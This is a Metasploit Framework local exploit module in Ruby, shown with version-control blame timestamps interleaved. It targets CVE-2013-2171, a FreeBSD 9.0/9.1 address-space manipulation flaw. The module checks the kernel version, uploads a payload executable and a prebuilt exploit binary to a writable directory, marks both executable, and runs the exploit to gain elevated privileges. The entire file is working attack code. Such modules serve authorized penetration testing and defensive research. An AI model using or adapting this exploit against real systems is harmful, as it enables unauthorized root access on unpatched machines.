2013-06-24 16:50:21 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit4 < Msf::Exploit::Local
|
|
|
|
Rank = GreatRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::EXE
|
2013-06-25 15:40:55 +00:00
|
|
|
include Msf::Post::File
|
2013-06-24 20:48:54 +00:00
|
|
|
include Msf::Exploit::FileDropper
|
2013-06-24 16:50:21 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info, {
|
|
|
|
'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability that can be used to modify portions of
|
|
|
|
a process's address space, which may lead to privilege escalation. Systems
|
|
|
|
such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Konstantin Belousov', # Discovery
|
|
|
|
'Alan Cox', # Discovery
|
|
|
|
'Hunger', # POC
|
|
|
|
'sinn3r' # Metasploit
|
|
|
|
],
|
|
|
|
'Platform' => [ 'bsd' ],
|
|
|
|
'Arch' => [ ARCH_X86 ],
|
|
|
|
'SessionTypes' => [ 'shell' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2013-2171' ],
|
|
|
|
[ 'OSVDB', '94414' ],
|
|
|
|
[ 'EDB', '26368' ],
|
|
|
|
[ 'BID', '60615' ],
|
|
|
|
[ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
|
|
|
|
],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'FreeBSD x86', {} ]
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => "Jun 18 2013",
|
|
|
|
}
|
|
|
|
))
|
2013-06-25 15:40:55 +00:00
|
|
|
register_options([
|
|
|
|
# It isn't OptPath becuase it's a *remote* path
|
|
|
|
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
|
|
|
|
], self.class)
|
|
|
|
|
2013-06-24 16:50:21 +00:00
|
|
|
end
|
|
|
|
|
2013-06-24 20:54:41 +00:00
|
|
|
def check
|
|
|
|
res = session.shell_command_token("uname -a")
|
|
|
|
return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
|
|
|
|
|
|
|
|
Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
2013-06-24 16:50:21 +00:00
|
|
|
def upload_payload
|
2013-06-25 15:40:55 +00:00
|
|
|
fname = datastore['WritableDir']
|
|
|
|
fname = "#{fname}/" unless fname =~ %r'/$'
|
|
|
|
if fname.length > 36
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::BadConfig, "WritableDir can't be longer than 33 characters")
|
2013-06-25 15:40:55 +00:00
|
|
|
end
|
|
|
|
fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
|
|
|
|
|
2013-06-24 16:50:21 +00:00
|
|
|
p = generate_payload_exe
|
2013-06-25 22:25:14 +00:00
|
|
|
write_file(fname, p)
|
|
|
|
return nil if not file_exist?(fname)
|
|
|
|
cmd_exec("chmod +x #{fname}")
|
2013-06-24 16:50:21 +00:00
|
|
|
fname
|
|
|
|
end
|
|
|
|
|
|
|
|
def generate_exploit(payload_fname)
|
|
|
|
#
|
|
|
|
# Metasm does not support FreeBSD executable generation.
|
|
|
|
#
|
|
|
|
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
|
2013-06-25 15:40:55 +00:00
|
|
|
x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
|
|
|
|
x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
|
2013-06-24 16:50:21 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def upload_exploit(payload_fname)
|
2013-06-25 15:40:55 +00:00
|
|
|
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
|
2013-06-24 16:50:21 +00:00
|
|
|
bin = generate_exploit(payload_fname)
|
2013-06-25 22:25:14 +00:00
|
|
|
write_file(fname, bin)
|
|
|
|
return nil if not file_exist?(fname)
|
|
|
|
cmd_exec("chmod +x #{fname}")
|
2013-06-24 16:50:21 +00:00
|
|
|
fname
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2013-06-24 20:48:54 +00:00
|
|
|
payload_fname = upload_payload
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::NotFound, "Payload failed to upload") if payload_fname.nil?
|
2013-06-24 20:48:54 +00:00
|
|
|
print_status("Payload #{payload_fname} uploaded.")
|
|
|
|
|
|
|
|
exploit_fname = upload_exploit(payload_fname)
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil?
|
2013-06-24 20:48:54 +00:00
|
|
|
print_status("Exploit #{exploit_fname} uploaded.")
|
2013-06-24 16:50:21 +00:00
|
|
|
|
2013-06-24 20:48:54 +00:00
|
|
|
register_files_for_cleanup(payload_fname, exploit_fname)
|
2013-06-24 16:50:21 +00:00
|
|
|
|
2013-06-24 20:48:54 +00:00
|
|
|
print_status("Executing #{exploit_fname}")
|
|
|
|
cmd_exec(exploit_fname)
|
2013-06-24 16:50:21 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|